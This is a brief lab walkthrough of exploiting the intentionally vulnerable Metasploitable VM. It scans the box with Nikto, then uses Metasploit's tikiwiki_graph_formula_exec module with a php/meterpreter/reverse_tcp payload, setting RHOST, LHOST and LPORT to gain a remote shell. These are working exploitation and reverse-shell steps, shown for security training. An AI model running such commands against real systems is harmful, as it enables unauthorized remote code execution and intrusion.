Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.
You can download the box here.
When scanning the box with Nikto the output reveals the CMS version has a vulnerability that allows remote PHP code execution. We’re going to use Metasploit to run the exploit.
Fire up msfconsole
. Let’s see whether it has modules for tikiwiki.
search tikiwiki
Set the exploit exploit/unix/webapp/tikiwiki_graph_formula_exe
c with the command
use index_of_the_module
You can see the payload options with the command options
: in order to run the exploit, we have to set the IP of the remote host (Metasploitable 1), the IP of the attacking machine, the listening port and the payload compatible with the specific environment. All these options can be set with the following commands:
set RHOST target_ip_address
set LHOST attacker_ip_address
set LPORT attacker_listening_port
set PAYLOAD php/meterpreter/reverse_tcp
(default of this module)
We have a meterpreter shell.